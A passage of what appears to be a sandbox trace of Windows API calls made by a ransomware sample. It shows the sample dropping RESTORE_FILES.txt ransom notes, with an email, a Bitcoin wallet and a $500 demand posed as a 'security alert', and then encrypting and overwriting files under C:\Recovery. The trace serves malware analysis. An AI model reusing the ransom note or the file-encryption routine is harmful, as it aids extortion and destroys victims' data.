(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.372] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0077.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.373] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0077.373] CloseHandle (hObject=0xb4) returned 1 [0077.373] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0077.373] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0077.374] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\RESTORE_FILES.txt") returned 45 [0077.374] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\java\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.374] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.374] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.375] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.375] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.375] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.375] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0077.375] CloseHandle (hObject=0xa4) returned 1 [0077.375] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.375] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0077.375] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\RESTORE_FILES.txt") returned 40 [0077.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0077.376] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.376] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.376] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.376] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0077.377] CloseHandle (hObject=0xac) returned 1 [0077.377] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Program Files") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0077.377] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0077.377] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates") returned 28 [0077.377] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0077.377] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0077.377] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates\\*") returned 30 [0077.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0077.377] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0077.377] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0077.377] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\RESTORE_FILES.txt") returned 36 [0077.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0077.380] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.380] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0077.381] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.381] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0077.381] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.381] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0077.381] CloseHandle (hObject=0xa0) returned 1 [0077.381] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Windows") returned -1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Program Files") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="Program Files (x86)") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="$Recycle.bin") returned 1 [0077.381] lstrcmpiW (lpString1="Recovery", lpString2="System Volume Information") returned -1 [0077.381] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0077.381] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0077.381] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0077.381] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\*") returned 17 [0077.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0077.384] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.384] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\.") returned 17 [0077.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.384] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.384] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.384] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\." (normalized: "c:\\recovery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.384] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.384] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.384] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\..") returned 18 [0077.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.384] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.384] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0077.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0077.384] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.384] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="Program Files (x86)") returned -1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 52 [0077.385] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0077.385] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned 54 [0077.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b910 [0077.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.385] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.") returned 54 [0077.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.385] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0077.385] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0077.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.385] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\." (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.385] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.385] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\..") returned 55 [0077.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.385] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0077.385] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0077.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.386] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.." (normalized: "c:\\recovery"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.386] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Windows") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Program Files") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="Program Files (x86)") returned -1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="$Recycle.bin") returned 1 [0077.386] lstrcmpiW (lpString1="boot.sdi", lpString2="System Volume Information") returned -1 [0077.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrIW (lpFirst="boot.sdi", lpSrch=".protected") returned 0x0 [0077.386] lstrcmpW (lpString1="boot.sdi", lpString2="RESTORE_FILES.txt") returned -1 [0077.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0077.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0077.386] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".txt") returned 0x0 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".rar") returned 0x0 [0077.386] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 61 [0077.386] StrStrW (lpFirst="boot.sdi", lpSrch=".zip") returned 0x0 [0077.386] ReadFile (in: hFile=0xa4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.401] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.401] WriteFile (in: hFile=0xa4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0077.402] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.402] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, 